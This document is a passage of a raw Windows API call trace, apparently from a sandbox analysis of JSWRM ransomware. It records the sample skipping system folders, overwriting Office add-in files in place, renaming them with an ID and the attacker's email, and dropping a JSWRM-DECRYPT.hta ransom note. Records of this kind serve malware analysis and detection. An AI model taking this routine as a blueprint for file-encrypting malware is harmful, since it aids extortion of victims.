returned 0x20dde8 [0125.508] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x20dde8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0125.508] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2254c0 | out: hHeap=0x1e0000) returned 1 [0125.508] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x244f90 [0125.508] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e8b8 | out: hHeap=0x1e0000) returned 1 [0125.509] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0125.509] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d800 | out: hHeap=0x1e0000) returned 1 [0125.509] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x37869c8, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x37869c8, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x37869c8, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4710, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0125.509] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2=".") returned 1 [0125.509] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="..") returned 1 [0125.509] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="...") returned 1 [0125.509] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="windows") returned -1 [0125.509] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="recovery") returned -1 [0125.509] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="perflogs") returned -1 [0125.509] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="documents and settings") returned 1 [0125.509] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.509] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="system volume information") returned -1 [0125.509] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="msocache") returned -1 [0125.509] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2254c0 [0125.509] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0125.509] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d728 [0125.509] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x20d728, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0125.509] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2254c0 | out: hHeap=0x1e0000) returned 1 [0125.509] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225768 [0125.509] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0125.509] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0125.509] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x20dba8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0125.509] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225768 | out: hHeap=0x1e0000) returned 1 [0125.509] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x2450c8 [0125.509] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x244f90 | out: hHeap=0x1e0000) returned 1 [0125.509] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0125.509] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d728 | out: hHeap=0x1e0000) returned 1 [0125.509] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x15ede724, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x15ede724, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x15ede724, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4f4d8, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="PowerViewRes.sr-Latn-CS.xap", cAlternateFileName="POWERV~1.XAP")) returned 1 [0125.509] lstrcmpiW (lpString1="PowerViewRes.sr-Latn-CS.xap", lpString2=".") returned 1 [0125.509] lstrcmpiW (lpString1="PowerViewRes.sr-Latn-CS.xap", lpString2="..") returned 1 [0125.509] lstrcmpiW (lpString1="PowerViewRes.sr-Latn-CS.xap", lpString2="...") returned 1 [0125.509] lstrcmpiW (lpString1="PowerViewRes.sr-Latn-CS.xap", lpString2="windows") returned -1 [0125.509] lstrcmpiW (lpString1="PowerViewRes.sr-Latn-CS.xap", lpString2="recovery") returned -1 [0125.509] lstrcmpiW (lpString1="PowerViewRes.sr-Latn-CS.xap", lpString2="perflogs") returned 1 [0125.509] lstrcmpiW (lpString1="PowerViewRes.sr-Latn-CS.xap", lpString2="documents and settings") returned 1 [0125.510] lstrcmpiW (lpString1="PowerViewRes.sr-Latn-CS.xap", lpString2="$RECYCLE.BIN") returned 1 [0125.510] lstrcmpiW (lpString1="PowerViewRes.sr-Latn-CS.xap", lpString2="system volume information") returned -1 [0125.510] lstrcmpiW (lpString1="PowerViewRes.sr-Latn-CS.xap", lpString2="msocache") returned 1 [0125.510] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0125.510] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.sr-Latn-CS.xap", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0125.510] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0125.510] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.sr-Latn-CS.xap", cchWideChar=27, lpMultiByteStr=0x241268, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerViewRes.sr-Latn-CS.xap", lpUsedDefaultChar=0x0) returned 27 [0125.510] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0125.510] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0125.510] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.sr-Latn-CS.xap", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0125.510] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0125.510] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.sr-Latn-CS.xap", cchWideChar=27, lpMultiByteStr=0x240ef8, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerViewRes.sr-Latn-CS.xap", lpUsedDefaultChar=0x0) returned 27 [0125.510] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0125.510] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf0) returned 0x2476a8 [0125.510] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2450c8 | out: hHeap=0x1e0000) returned 1 [0125.510] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0125.510] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e22c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0125.510] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf0) returned 0x2474b8 [0125.510] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\sr-Latn-CS\\PowerViewRes.sr-Latn-CS.xap" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\sr-latn-cs\\powerviewres.sr-latn-cs.xap"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0125.511] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e1c0 | out: lpFileSize=0x345e1c0*=324824) returned 1 [0125.511] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0125.511] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2501e8 [0125.512] ReadFile (in: hFile=0x338, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e1cc*=0x27100, lpOverlapped=0x0) returned 1 [0125.526] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0125.526] WriteFile (in: hFile=0x338, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e1c8*=0x27100, lpOverlapped=0x0) returned 1 [0125.527] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0125.527] CloseHandle (hObject=0x338) returned 1 [0125.527] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf0) returned 0x2477a0 [0125.527] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0125.527] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0125.527] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0125.527] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0125.527] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0125.527] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0125.527] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0125.527] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0125.527] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0125.527] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x100) returned 0x1f19f0 [0125.527] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x17e) returned 0x201d10 [0125.527] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f19f0 | out: hHeap=0x1e0000) returned 1 [0125.527] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0125.527] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\sr-Latn-CS\\PowerViewRes.sr-Latn-CS.xap" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\sr-latn-cs\\powerviewres.sr-latn-cs.xap"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\sr-Latn-CS\\PowerViewRes.sr-Latn-CS.xap.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\sr-latn-cs\\powerviewres.sr-latn-cs.xap.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0125.529] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x201d10 | out: hHeap=0x1e0000) returned 1 [0125.529] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0125.529] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0125.529] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0125.529] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0125.529] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x15ede724, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x15ede724, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x15ede724, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4f4d8, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="PowerViewRes.sr-Latn-CS.xap", cAlternateFileName="POWERV~1.XAP")) returned 0 [0125.529] FindClose (in: hFindFile=0x231ec0 | out: hFindFile=0x231ec0) returned 1 [0125.529] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0125.529] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b5d8 | out: hHeap=0x1e0000) returned 1 [0125.529] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b830 | out: hHeap=0x1e0000) returned 1 [0125.529] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa8eba59, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16035c5a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16035c5a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="sv", cAlternateFileName="")) returned 1 [0125.529] lstrcmpiW (lpString1="sv", lpString2=".") returned 1 [0125.529] lstrcmpiW (lpString1="sv", lpString2="..") returned 1 [0125.529] lstrcmpiW (lpString1="sv", lpString2="...") returned 1 [0125.529] lstrcmpiW (lpString1="sv", lpString2="windows") returned -1 [0125.529] lstrcmpiW (lpString1="sv", lpString2="recovery") returned 1 [0125.529] lstrcmpiW (lpString1="sv", lpString2="perflogs") returned 1 [0125.529] lstrcmpiW (lpString1="sv", lpString2="documents and settings") returned 1 [0125.529] lstrcmpiW (lpString1="sv", lpString2="$RECYCLE.BIN") returned 1 [0125.529] lstrcmpiW (lpString1="sv", lpString2="system volume information") returned -1 [0125.529] lstrcmpiW (lpString1="sv", lpString2="msocache") returned 1 [0125.529] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0125.529] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b510 | out: hHeap=0x1e0000) returned 1 [0125.529] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236970 [0125.530] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0125.530] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e688 [0125.530] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0125.530] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\sv\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\sv\\jswrm-decrypt.hta")) returned 0xffffffff [0125.532] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e688 | out: hHeap=0x1e0000) returned 1 [0125.532] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0125.532] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b424, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0125.532] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0125.532] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x2501e8 [0125.532] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0125.532] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x251fb8 [0125.532] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0125.532] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2362f8 [0125.532] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dcb0 [0125.532] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2362f8 | out: hHeap=0x1e0000) returned 1 [0125.532] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\sv\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\sv\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0125.534] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0125.534] WriteFile (in: hFile=0x314, lpBuffer=0x345b538*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b504, lpOverlapped=0x0 | out: lpBuffer=0x345b538*, lpNumberOfBytesWritten=0x345b504*=0x230c, lpOverlapped=0x0) returned 1 [0125.535] CloseHandle (hObject=0x314) returned 1 [0125.535] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dcb0 | out: hHeap=0x1e0000) returned 1 [0125.535] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x251fb8 | out: hHeap=0x1e0000) returned 1 [0125.536] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236970 | out: hHeap=0x1e0000) returned 1 [0125.536] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0125.536] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0125.536] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0125.536] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236970 [0125.536] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e688 [0125.536] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236970 | out: hHeap=0x1e0000) returned 1 [0125.536] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\sv\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\sv\\jswrm-decrypt.hta")) returned 0x20 [0125.536] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e688 | out: hHeap=0x1e0000) returned 1 [0125.536] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0125.536] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0125.536] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\sv\\*.*", lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa8eba59, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16035c5a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x417cb9d0, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName=".", cAlternateFileName="")) returned 0x231dc0 [0125.536] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0125.536] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa8eba59, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16035c5a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x417cb9d0, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="..", cAlternateFileName="")) returned 1 [0125.536] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0125.536] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0125.536] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x3a5b63a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x3a5b63a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x160a83ba, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc3ab8, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="AdHocReportingExcelClient.dll", cAlternateFileName="ADHOCR~1.DLL")) returned 1 [0125.537] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2=".") returned 1 [0125.537] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="..") returned 1 [0125.537] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="...") returned 1 [0125.537] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="windows") returned -1 [0125.537] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="recovery") returned -1 [0125.537] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="perflogs") returned -1 [0125.537] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="documents and settings") returned -1 [0125.537] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.537] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="system volume information") returned -1 [0125.537] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="msocache") returned -1 [0125.537] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0125.537] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0125.537] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0125.537] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x240fc0, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdHocReportingExcelClient.dll", lpUsedDefaultChar=0x0) returned 29 [0125.537] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0125.537] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0125.537] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0125.537] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0125.537] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x240ef8, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdHocReportingExcelClient.dll", lpUsedDefaultChar=0x0) returned 29 [0125.537] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0125.537] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b908 [0125.537] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: 